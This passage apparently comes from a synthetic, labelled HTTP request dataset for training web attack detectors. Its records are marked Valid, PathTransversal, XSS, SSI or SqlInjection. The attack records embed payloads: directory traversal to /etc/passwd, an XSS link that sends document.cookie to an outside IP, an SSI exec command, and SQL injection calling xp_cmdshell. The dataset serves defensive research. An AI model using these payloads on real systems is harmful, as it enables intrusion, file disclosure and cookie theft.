GET /h3rNPU/PtmpdxPu64y/iYsGmIvaw/2qs_0j4WAbJHwR1wb5Q/p1Tiv/rdnert5natwtnx0et/thmSGzhH/lz_/pAQ46-/hV721nS@rsUHJH@iG4/n2e6m1semya1tCmdh3t.gif?hctT=3869569&pa=riHinu8&nv=Uh&inHnesetzaolH=5c&arretessH=1510328&T8thvdh0apaLm=eeceatnIygtw&oMstr6yol=aiaeo&@VD_PnCpassthrudeleteIB=ne%3Dn&QYnodezZFa=6&ntywOhIent=ckt&dler=q04nz&fhLtTn=4047&Xf9zzAzcJ1=tD0PRN40 HTTP/1.0
Host: www.D3uwhefotn.org
Connection: close
Accept: text/*;q=0.4, video/mpeg;q=0.8, video/quicktime
Accept-Charset: iso-8859-3, windows-874, windows-874, shift_jis
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 49.210.77.74
Cookie: iat=f
Cookie2: $Version="538"
Date: Sun, 17 Apr 05 17:20:03 CET
ETag: W/"-.w@IHBgqop4Z7b"
Expect: 100-continue
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Tue, 08 Sep 09 22:19:30 CET
If-Unmodified-Since: Fri, 29 Jun 07 16:59:01 UTC
If-Match: "9dfAun-3oNZ4Cv.qUg0b"
If-None-Match: *
If-Range: Wed, 14 Mar 07 18:41:05 CET
Max-Forwards: 2906
MIME-Version: 9.4
Pragma: o=xa1tshh
Proxy-Authorization: Basic b3VkOUU6VEVhcGNhcHM=
Authorization: wtroT 8dMsCpzU=ftsrett
Range: -25
Referer: /srtatsAU/hltr1dwa/9lnea.tiff
TE: trailers,trailers
Trailer: Warning
User-Agent: htPwuN/0.5.0
UA-CPU: PowerPC
UA-Disp: 9153,8066,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0542x2765
Via: 3.7 www.s6yt.shtml, 0.4 215.192.211.21, 5.5 www.9umrf.jpeg
Transfer-Encoding: deflate
Upgrade: rle/0.9, 32noar/1.9, terase/3.6, lop/4.7, lgd/8.7
Warning: 105 194.179.101.101:797 "yfe4eht3aAartosoia" "Tue, 19 Jul 05 17:23:33 GMT"
X-Forwarded-For: 40.222.86.185
X-Serial-Number: 42015
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21561
Start - Id: 14054
class: Valid
GET /l2X/ja/uqerjaarve8et/zxsh3t9pRuehuald.tiff?HeswoyfArut=6592065&eNVYV@Fhomedelete=2980791&titcn9nsowdld=4871 HTTP/1.0
Host: 200.209.89.128
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: oaaoefts-rt, nsbe-dif47w, npkgDln-aEi;q=0.1, 2-e, hv3s-x8uocr
Cache-Control: max-stale=29337
Client-ip: 234.224.59.200
Cookie: 01XWvrda=esm6-Ih-LuR;f5f=nEXen;erarTp=sSptd7E;rxh=ajideElsE8noein;a9e9tnlpiihwa=tedypnnF4;rteiMssGlo=236
Cookie2: $Version="304"
Date: Mon, 20 Nov 06 22:22:12 UTC
ETag: "SWtDsXUVFoys_8bcY"
Expect: 100-continue
From: ersWoye@CaetbWt.gov
If-Modified-Since: Wed, 20 Jul 05 09:35:44 UTC
If-Unmodified-Since: Mon, 11 Dec 06 02:48:12 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Aug 08 06:15:40 UTC
Max-Forwards: 3380
MIME-Version: 2.6
Pragma: jardukis=0
Proxy-Authorization: NTLM OG9zZXlhOHNlZWxlaXRDNGpydGFFb05sNUUxdHI0YWRUczhuOHVJbGh5
Authorization: Basic TWgyY2lnOmtlZWNjbQ==
Range: 477582-,-394214
Referer: /ysebS8/lmru/ndse7N/notm.jpg
TE: trailers
Trailer: Trailer
User-Agent: nt66r9 (dnETwRFKsS; 6AKf4Zuu; fGDajYsm; o370OJe)
UA-CPU: StrongARM
UA-Disp: 091,777,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9552x9727
Via: FTP/1.5 www.ixynhk.jpg, cIc/5.9 www.ef9oal.js
Transfer-Encoding: nW8enh; hwnesn=rygPdAhh
Upgrade: iQr/6.2
Warning: 980 www.mem2oh.html "iEatsey" "Sat, 25 Sep 04 08:44:30 CET"
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 0043438224132828242
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14054
Start - Id: 9097
class: Valid
GET /vtohlioo1ddil6c/nfgGUNEIlfGsGg/gZRil7iYw7zyOie@xVX/Fhttps-@m7LQTMi/hq9zgM-XZaQWZ/xwPWJ5Y3/a0Nhumhfdnamtn/qeieuctbltlultnedEj/d4pTc3mDJst01vRLFbX.swf?Shrhag=aelinka%7Eitrb HTTP/1.1
Host: www.elo8.de
Connection: close
Accept: audio/basic;q=0.1
Accept-Charset: x-mac-turkish;q=0.9, x-mac-hebrew;q=0.7, windows-1255, gb2312, iso-8859-4
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.7
Cache-Control: min-fresh=644
Client-ip: 125.175.132.110
Cookie: b0saio=nLu-mdm
Cookie2: $Version="10"
Date: Fri, 08 Sep 06 20:03:46 CET
ETag: "N-_Zl.xtPHZul@X7ViA"
Expect: atctr7=tetz0Vi;iurtb
From: eo0inrr@xinaejal.fr
If-Modified-Since: Tue, 30 Nov 04 21:33:37 GMT
If-Unmodified-Since: Fri, 05 Oct 07 01:02:13 GMT
If-Match: "Yjgo1@T7vv1EqcC3i7F"
If-None-Match: "RKFFaghi_13oJznQQy6"
If-Range: Sat, 06 Nov 04 14:08:46 UTC
Max-Forwards: 8
MIME-Version: 3.6
Pragma: ayc='o9twy2Pt'
Proxy-Authorization: Digest uri=http://rre9huhj.ch/silitam.pl
Authorization: NTLM YnQzMGZsYW84dnNoYWV0dGlreWU2dGR2YWhsbmRtZXNvamlpaDM=
Range: -74002,17-59,16-
Referer: http://www.g5Nhs.cz/i4h3rae/cakdamk/tohtb/uxeb/itto.mpg
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/0.1 (Windows; U; WinNT 5.7; ap-ti; rv:3.8.3) Gecko/22958480
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9463x953
Via: 3.1 190.135.158.146:32, 4.1 www.lO4sm.gif
Transfer-Encoding: tuah; rXt2d44e=4fOgnjcr
Upgrade: nAzm/6.2, yh8o/8.1
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9097
Start - Id: 28628
class: Valid
GET /squN2VNClbWv@U-/heqH9iibne/sadEOEnth/uofR4Nt/divSKxml3QLYs59document/8nicbub0ieeell/awJ5group byrcQ/i0sne/rUCIg0r7mTfL.B42.js?T.adminetc=17958&b0lPoazee=%2Felib4o&9itbvs=penwe%3Ane8frcui5&nca3elrnssS=61281&bthkWjttnhty=e7nc%3Dajeuhh&2iiuietathnic5=elo%25l&c2f0abonAe=tnypieGIsee7sjg&sesavlzyowT=+%3Aprocessing-instructionft&ap3et7ax=t&6ao2eolOt=eokmYznoalbnnsnoet&Hwnull0JxtermPP=834416146&2rPkOG._=xMqpl5U-.su&jri6ieestr=utEntsmLoyt+A%28e&i2Dzk8b=ha6%3C HTTP/1.1
Host: www.stSbleg.uk
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, deflate, gzip;q=0.9, deflate;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 158.158.21.22
Cookie: erlecymNsl=8857466;asephh=d
Cookie2: $Version="18"
Date: Sun, 24 May 09 01:55:07 CET
ETag: "m61Hns7ULAUNoP7"
Expect: veRndioe=tfNemfiT
From: 6EaEszit@irni.st
If-Modified-Since: Fri, 25 Jul 08 15:13:16 GMT
If-Unmodified-Since: Sat, 10 May 08 15:19:23 UTC
If-Match: "s-qZoWpiWTLLlXv"
If-None-Match: "@tpffn2ZBE73t8o"
If-Range: Tue, 23 Nov 04 23:22:51 GMT
Max-Forwards: 8
MIME-Version: 9.3
Pragma: ep=fRnwaa
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Basic NGFoUzplZHdo
Range: 554798-,-48,6195-
Referer: /seypdrw1/riqia/hyrev.png
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ansodnc7rh
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 680x3732
Via: 8.0 247.196.118.135
Transfer-Encoding: gzip
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 540 www.aacWusmD.jpeg "ehptcl" "Thu, 30 Mar 06 12:01:08 GMT"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28628
Start - Id: 46056
class: PathTransversal
GET /sock_streamI/e3sqWN2.gif?z7@5KIq=htranroeitpe&ihwdefinterRl=1&dees=20&splCiJob4eedt=kHjawprocessing-instruction5e%5Coeppb&v9nvtatiosh=9&0N7Suaionte=ii%29t&aMn=bp+ennwsnzmpt%2Fl1c&W4uNtv8zfpl=drls36r%288Zn&q@EYt-e=NtthuphTneArwess8&Uw2pOwOY=6snuu&mbiocoa=owX7tlF&hhlIrst=ohui&nfcctee=56&uEunitSooNa=ht7aeshsobK&rime5httt8eh3sa=hof HTTP/1.0
Host: www.apljnzae.biz
Connection: close
Accept: application/*, text/html;q=0.5, text/plain
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, compress, compress, compress;q=0.6, gzip
Accept-Language: *;q=0.1
Cache-Control: min-fresh=4
Client-ip: 28.91.166.181
Cookie: tao1obx0ozoytct=../../../../../../../../../etc/passwd
Cookie2: $Version="426"
Date: Thu, 11 Aug 05 20:56:33 UTC
ETag: "Fdns_PqkqCoKhIcKue"
Expect: 3t0ectj
From: pH95do@eieRrn3C.org
If-Modified-Since: Sat, 30 Jan 10 05:30:16 GMT
If-Unmodified-Since: Sun, 26 Jun 05 02:37:36 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Jun 06 16:35:41 UTC
Max-Forwards: 960
MIME-Version: 1.1
Pragma: no-cache
Authorization: Digest cnonce="ndteFa"
Referer: http://sIMR.gov/o1chEit/utaiSR/tdtithso/4aeKnr.asmx
TE: deflate;q=0.4,chunked,trailers
Trailer: Via
User-Agent: oratalcniawartr
UA-CPU: 68000
UA-Disp: 478,2158,8
UA-OS: Solaris
UA-Color: color32
Via: 7.0 www.ogiNa.css:1
Transfer-Encoding: gzip
Upgrade: epAXs/9.0
Warning: 694 www.ftiedt.jpeg "r9el7ieioith" "Sun, 16 Oct 05 13:31:29 CET"
X-Forwarded-For: 161.12.232.56
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46056
Start - Id: 46929
class: XSS
POST /ZTVHHRNR-rs/s4/CUzYqM_y./emngohiOhwafdae4/izf6lnbts5i/T@R2VDIMBL.ql.nsf? HTTP/1.1
Content-Length: 349
Content-Language: glt,aa,Ve
Content-Encoding: gzip
Content-Location: http://www.oduot.uk/Oico2/seclo.htm
Content-MD5: NmFpZHJoNmRpSXNpd09UYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Jun 04 09:50:06 GMT
Last-Modified: Wed, 29 Nov 06 08:09:43 GMT
Host: 136.250.25.75:004
Connection: doNosaAw
Accept: audio/basic;q=0.6, image/jpeg;q=0.4, image/gif
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: e='n'
Client-ip: 233.117.50.11
Cookie: ixsoi=ite;toheaueei=4ER;taUIqseare3NV=w4D3C2Pl4X;KN5-1xp_q6Q5r=B5iqa
Cookie2: $Version="688"
Date: Sun, 25 Apr 04 20:45:41 CET
ETag: W/"ZePz2OHFeYlBvufA5PPg"
Expect: 100-continue
From: iadhhX@vmafir.de
If-Modified-Since: Wed, 03 Mar 04 23:49:43 UTC
If-Unmodified-Since: Sun, 04 Jul 04 13:46:43 CET
If-Match: "9NvXorM87VYW9eRQD"
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 9.1
Pragma: qldA=i3ones
Proxy-Authorization: Digest response="eFbfA56cDAdebE9DbbcbBaEe47d454df"
Authorization: Basic ZG1lY21jOm5pbHE=
Range: 531-1875,-8
Referer: http://www.delCogRn.st/asneetig/erfro/n2asil.pdf
TE: deflate,chunked
Trailer: Accept-Encoding
User-Agent: eRnPfnnN http://www.nHoiru.gov
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 642x9764
Via: 3.6 www.Ehaersum.gif, 1.9 www.tltenyls.shtml
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 133 128.21.84.17 "ewraoseeFm" "Fri, 27 Feb 04 19:29:24 CET"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

sot8hrlin5xans=0372710&ecljOnIauauie=sdWN&anztnhRte=259&nlfnpxagmtoi=11063&6efosdlote=h3968S&hu36celoRntla=685758&nnotbtvehfe=<link   rel   ="     stylesheet         "    href  ="javascript:   [window.open('http://38.225.225.142/lidech.php4'+document.cookie);]          ">&tiinalTc=75&sO=222&shepoi=80657888

End - Id: 46929
Start - Id: 19026
class: Valid
GET /rWCX1-4iN1rvKj/4pno4tra.png?Dfjaas=4neEete4culjtdsh&HWOR=5Y_D-eSK3-&sesuo=8 HTTP/1.1
Host: 87.19.158.219
Connection: close
Accept: image/*;q=0.7
Accept-Charset: windows-874;q=0.3, x-mac-korean, iso-8859-3, iso-8859-9, x-mac-ce
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 142.107.31.11
Cookie: mles=boLftp?s teastdin t4t;HcFcnFstdinq=sh5l6ifhtpNrsR;wcSLs=htm;mwc=n.s0HKX1;2e0xeoanbwipn=f=tb
Cookie2: $Version="62"
Date: Tue, 08 Sep 09 15:20:23 UTC
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: fhtwerb
From: hseomd@2oso.ch
If-Modified-Since: Fri, 24 Sep 04 02:06:03 UTC
If-Unmodified-Since: Tue, 31 May 05 21:05:22 GMT
If-Match: *
If-None-Match: "CYx7a3T_N1jzuP92"
If-Range: Tue, 18 Nov 08 21:24:21 CET
Max-Forwards: 063
MIME-Version: 8.1
Pragma: obegi=m0ndada
Proxy-Authorization: NTLM ZWxlbnJhbjRoZmdvcndzYm9yNGRuYUl1dXR3aDdlMWlwdGh0ZWE=
Authorization: Digest nonce
Range: 970214-
Referer: /tata/qb4a8r4e/etys/itoiR/osalku.sh
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/9.5 (Machintosh; U; PPC 1.6; Ia-nh; rv:1.6.9) Gecko/37216697
UA-CPU: MIPS
UA-Disp: 8898,8815,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 654x721
Via: HTTP/9.4 204.238.97.140, 2.7 www.tsaxa8.js
Transfer-Encoding: compress
Upgrade: Sa5x/4.1, eveeE/2.5
Warning: 116 170.222.10.170:68 "t5ueaspsrUFecey" "Tue, 17 Nov 09 03:08:22 GMT"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19026
Start - Id: 40207
class: SSI
POST /pu/readswmhrtuj9al/oxt/icps895RQ8yBtmp.tiff? HTTP/1.0
Content-Length: 128
Content-Language: ttMbc
Content-Encoding: gzip
Content-Location: http://chuoet.be/enesea7/iglt.pdf
Content-MD5: NG4xU3RwaGxmcGRzYWVyZQ==
Content-Type: application/x-www-form-urlencoded
Host: www.ijaacedodd.cz
Connection: keep-alive
Accept-Charset: cp-932, euc-cn, windows-1254
Accept-Encoding: 
Accept-Language: <!--     #exec  cmd="/bin/ls  -l    /home/wnp6tsWsv/saa"     -->
Referer: http://hetei.net/gwOumd/stm2/da4a.jpg
User-Agent: 55lruueme (o6hr4pBE; kP3CEJU; gKc8vnsLUP; ncebEFC; 85-NCA3e)
UA-Pixels: 616x735

rgPs=qWKyOZg6h&IfjwtReeeteh=176299&nmeMinx4Yr=qnphckAZzX&ouKlei=25245073&sidirtoInash=7ttemnqvoan73Nnro&oej0hdfembGaiAe=00234644

End - Id: 40207
Start - Id: 26566
class: Valid
GET /2n8/cN/lo4ut6re8aiks1/edreIe2eonx/d47.P/os9u28Y3dMOQGKXTwus/gNtRipp51yg0aJwindow.open2/iFL8qZ_37/oueno/xNa5CUPvbI/MGa1Rv1/Neduitch7millxrrelAe.nsf?nntergaatqo=Z%261Ni%3AYaei+rNtEli&Reihfcc=4e&lmttuinlehfn=+unionet&kS_r7JcatiadminI=sNqSz&snotep=eBkCYQcKwGx&8nodezxAQM=re&ssbso5=29&et3mlmaf=e0dp&aotmwsle=d&Up5lM=fei9s&tneng2indnsf=%3D%7Ca&eyllisYfARi=tyoenlIq&ausEedhmer3l=42009&o3hprab4cieleDr=e%24processing-instructions HTTP/1.0
Host: www.hbo3afg.ch:80
Connection: close
Accept: audio/*
Accept-Charset: hz-gb-2312, macintosh, cp-936, iso-8859-15, windows-1257;q=0.4
Accept-Encoding: *
Accept-Language: yeceezhr-rfftMot;q=0.2, mrhhs-tt;q=0.8, et7y-iyaWfoe;q=0.3
Cache-Control: no-transform
Client-ip: 126.247.210.228
Cookie: 7iujHq=hOodS0e0s;bjtwupb2ahoog5j=neftrtriLaweasehh;9neho6hso=12k;ts=587293152
Cookie2: $Version="969"
Date: Sun, 05 Oct 08 16:39:20 CET
ETag: W/"yGYT@a0rPlvMkiL8"
Expect: 100-continue
From: 38etTilw@Mohp.biz
If-Modified-Since: Tue, 27 Jan 09 17:07:34 UTC
If-Unmodified-Since: Thu, 21 Jan 10 04:30:17 CET
If-Match: *
If-None-Match: "k0v4v2SL7ahwbJp"
If-Range: *
Max-Forwards: 614
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM NmV1ZWFuZWU4ZW5lZWJ1aWZhN2Fwc2k2ZXNvaWgwUjF1dGFlaQ==
Authorization: NTLM SENvcm5leGhvYWRiaXNubGVvZHdpeHRld2N0RVB0azN5dGE4dA==
Range: 9769-87960,68614-
Referer: http://www.et5ni.fr/laaoin/wytq/nteme/rgle/snrn.gif
TE: trailers
Trailer: If-Match
User-Agent: dbkt.r1- http://www.baieiaWe.be
UA-CPU: Sparc
UA-Disp: 0886,5567,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6083x8354
Via: 2.8 www.fnHlded6.html, 4.3 www.dqos.tiff, 8.9 156.171.224.93
Transfer-Encoding: eeur5m
Upgrade: itrxt/3.8, zdmh/3.6, Tmtet/5.7, 8t6vuj/5.9
Warning: 441 www.aram.shtml "aigi2urFwunlumclaef" "Fri, 26 Aug 05 10:11:16 CET"
X-Forwarded-For: 14.228.155.87
X-Serial-Number: 693373977262
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26566
Start - Id: 30673
class: Valid
GET /e-iiBPfk/ZiframekvrhavingCReZcTW/aX@r./tUnodeT/uRn.pT6v6_QMogKY9MI/sL/nKXUgp__LOhKWQK2td/ljlf-U9.Z/udtz/u2x/ebS.gif?5vo4dqjAdu=hQ_V70KLC4&ia=YEme%3B-s0ze2oadu-bcatrhtpass&0sbtboeJKeopne=oifobaSgte9g&pereil=m&ZstdinqoSYc=traataefh&yEsmNtiote=Ne%27j%5COp%3Dk&iziflinkmz=bsaio%3CMtedpa&2nuwindow.openZVopenT2oj=m&adem5=4178 HTTP/1.0
Host: 53.178.101.216
Connection: keep-alive
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 78.145.112.44
Cookie: nraewipiyis=g2isH+o
Cookie2: $Version="72"
Date: Wed, 17 Nov 04 13:49:12 GMT
ETag: W/"OelsPWMPvfoQSk@SA0pH"
Expect: 100-continue
From: Sunw8ia@ecjo.be
If-Modified-Since: Sat, 25 Oct 08 02:17:28 GMT
If-Unmodified-Since: Wed, 07 Jul 04 09:38:46 UTC
If-Match: "GYxLFZ7HU2ASbyWjMYY"
If-None-Match: *
If-Range: Mon, 22 Oct 07 19:17:03 GMT
Max-Forwards: 36
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM c2N2b3NkYTNpc3ZidHJpNmVvaWFlbG9sYmlpYWJhN2htTmJhQ3RpZg==
Authorization: Digest nonce
Range: 174-63482
Referer: http://ZJsioo.be/Tketv/heos/ge9awti/dinioi/onOudase.mpg
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 0.2; Do-tc; rv:6.1.1) Gecko/89053721
UA-CPU: PowerPC
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/5.2 250.54.215.0, HTTP/9.5 147.119.94.111, 8Tdtat/2.1 www.otzeN.jpg
Transfer-Encoding: identity
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 834 64.62.125.81 "mrreedes" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 62673072943112918
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 30673
Start - Id: 35042
class: SqlInjection
GET /sXZJPTZl9e3jvLj2gFD/s4SwMuwHdaY9tC-GVdM/X7k@CmB/oWw@mXm5h/tZVKn4ntUDpGF/t1oLj1M@vld/Hzl9ctoom/l1Orp3Rx/mimgzUQl5lI2z/kGq0acatc0a7/oo.gif?rz8ssl6tf=%27%3BEXEC+master.dbo.xp_cmdshell++++%27cmd.exe&Cn11hiiogrh=ieoa HTTP/1.0
Host: 31.94.22.35:80
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, cp-932;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: qto9ngnn-raah6
Cache-Control: no-transform
Client-ip: 175.67.198.190
Cookie: tbsn=8426;usrnc0Yobject=a0;sesonooawaqe=836;5e2nfANemans1s=tf8TamL7CV5;rwrt=7
Date: Tue, 19 Aug 08 05:06:23 GMT
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Thu, 10 Aug 06 08:43:56 GMT
If-Unmodified-Since: Wed, 05 Jan 05 16:51:01 CET
If-Match: "8Zn6mowOzKX6RPdh4VTh"
If-None-Match: "roFLr8FqhDW.T0n1tCk"
If-Range: *
Max-Forwards: 6897
MIME-Version: 1.5
Pragma: eu='rpnsaahi'
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: Basic ZWJycW5uOmVlYmlZa3Q=
Range: 032643-
Referer: http://www.msoDr.de/q8reg.png
TE: trailers
User-Agent: Mozilla/0.2 (Windows; U; Windows NT 2.3; te-nb; rv:9.1.4) Gecko/60137313
UA-CPU: StrongARM
UA-Color: color32
Via: 6.4 www.nacffhNz.htm:6
Transfer-Encoding: bn6tsc; Eieotn0k=oxswj
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35042
Start - Id: 41990
class: SqlInjection
GET /nat/alotqt8hg7reaTU/ehoosehsnseaeydnwntl.dll?nhhmlndisoi=utyorhactrit&KEePE=un++a+e&so4cyso=%27++++%29++++UNION++++ALL+++++SELECT++nblTQ+++++FROM+++odt+++WHERE+++++%28+++%27%27++%3D%27&fduakhysii=itvl&bs8oO8o0=83&F3duehre=Mgi7moa&ha2y=788&ieh=paol9&ovr0ua=f&fo.PuYR=%27%2Be%25uC5&4jeaioUoue6jdtr=5tg6Auyoa%3F+art+7roJ%3C&ledtcoeaoodriye=48282&eeeR=processing-instructionaconnect HTTP/1.1
Host: www.idYxtine.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tCcaei-trumrer;q=0.9
Cache-Control: max-stale=5126
Client-ip: 165.230.81.35
Cookie: hcg=5375748072
Cookie2: $Version="419"
Date: Tue, 19 Aug 08 17:24:02 UTC
ETag: "@kad9QMXdlP@jeeYm73"
Expect: taus=aiyn
From: wXro@erouh.com
If-Modified-Since: Sun, 20 Jul 08 19:13:38 UTC
If-Unmodified-Since: Tue, 09 Oct 07 04:21:18 UTC
If-Match: *
If-None-Match: "0.rygmfxAVgEQxL8B"
If-Range: "@3kiotqHU5azj7HoXS"
Max-Forwards: 31
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM c2U0dUNCc2F0ZUVuNWVvZ3RhTW10aWdlbGFvZXU0bUE2YWlpYw==
Authorization: Digest opaque="ohoec"
Range: -728027,84041-8,736156-
Referer: http://9setnnn.uk/twsid/eGamulwt/vnWiAlc.asmx
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: tsoig5tdor
UA-CPU: x86
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4309x0685
Via: 6.5 152.108.9.22:2, 2.0 221.26.68.151
Transfer-Encoding: identity
Upgrade: tsem/9.8, icrMn/2.4
Warning: 567 141.96.99.110 "rih65mresz2g" 
X-Forwarded-For: 23.57.98.8
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41990
Start - Id: 46329
class: PathTransversal
GET /rcuRAUGgwed6kw@WQzjB/uT66INUlR33Rnullu/eeonciuecx0nenel/Ke/3wea1d5xoe.gif?9fqtw=7&_Fe5tlcmd-tmpXstdin=iiim_38zzs&nxnct9cengHnd=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&T4=885&4ioi=+ HTTP/1.1
Host: 13.122.98.160:3
Connection: keep-alive
Accept: application/zip, image/*, text/html
Accept-Charset: *
Accept-Encoding: deflate, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 146.96.8.202
Cookie: c5op=rlhwinntt]w3En;taerri5t8et7me=tGKmNLY@mKi;-UHFL=b75lxZPK;IOe6eatrhusiihi=mWLiS87k
Cookie2: $Version="825"
Date: Tue, 22 Sep 09 09:25:59 GMT
ETag: "@85HgN2pUsOQN6a@owQ"
Expect: 1hasIgDs=ebbe;d2yieais
From: sgtDwB@5isge.ch
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "Tc43xM5D.37nERrwv5mJ"
If-None-Match: *
If-Range: "slnPTwfk7G9XoLL7KF0S"
Max-Forwards: 222
MIME-Version: 6.3
Pragma: Ue=uyd3P
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: NTLM aW9ybHJlMnI3aG9lZWh0c2NpOWFtZXJzYW5yS25waXJw
Range: 595-7160,98-,4-961
Referer: http://na7aa0n.uk/nret129/astnyto.cgi
TE: trailers
Trailer: Max-Forwards
User-Agent: hshaowmy/9.1.0.6
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 598x8169
Via: 3.7 www.ih8e7.js:231, 1.6 90.219.189.230, HTTP/0.1 245.240.240.116
Transfer-Encoding: tlxupn
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 5744439401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46329
Start - Id: 17424
class: Valid
GET /cUdTreplaceW5xmlS6/rD86U/fFN/ymZrbqQCEQSRAp.cfm? HTTP/1.0
Host: www.iletit.uk
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.1, euc-jp, macintosh;q=0.0
Accept-Encoding: gzip;q=0.1, deflate;q=0.3, identity;q=0.1
Accept-Language: tn-e, ambptw-irt3ej;q=0.9, atnbaorc-nvncr;q=0.6
Cache-Control: max-stale
Client-ip: 170.148.124.221
Cookie: agumpetsele=9053;@mIaDOUMNV=hoeopt;asbkl=ezs3bdre
Cookie2: $Version="53"
Date: Fri, 14 Oct 05 13:28:09 GMT
ETag: "e5d8ok3_mJE_zsChVQxZ"
Expect: 100-continue
From: asobeo@yaOtdneg.de
If-Modified-Since: Wed, 20 Sep 06 11:20:14 GMT
If-Unmodified-Since: Mon, 28 Mar 05 23:13:10 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Oct 08 18:53:09 CET
Max-Forwards: 7921
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Basic aWZyaGlvY246eGllc2Fh
Range: -4628,35-7
Referer: http://www.zsboc.fr/bamnde/aTerI/tjendjc/l8tw.wav
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.9 (Machintosh; U; PPC 7.2; 49-w6; rv:9.2.9) Gecko/24318869
UA-CPU: 68000
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 429x433
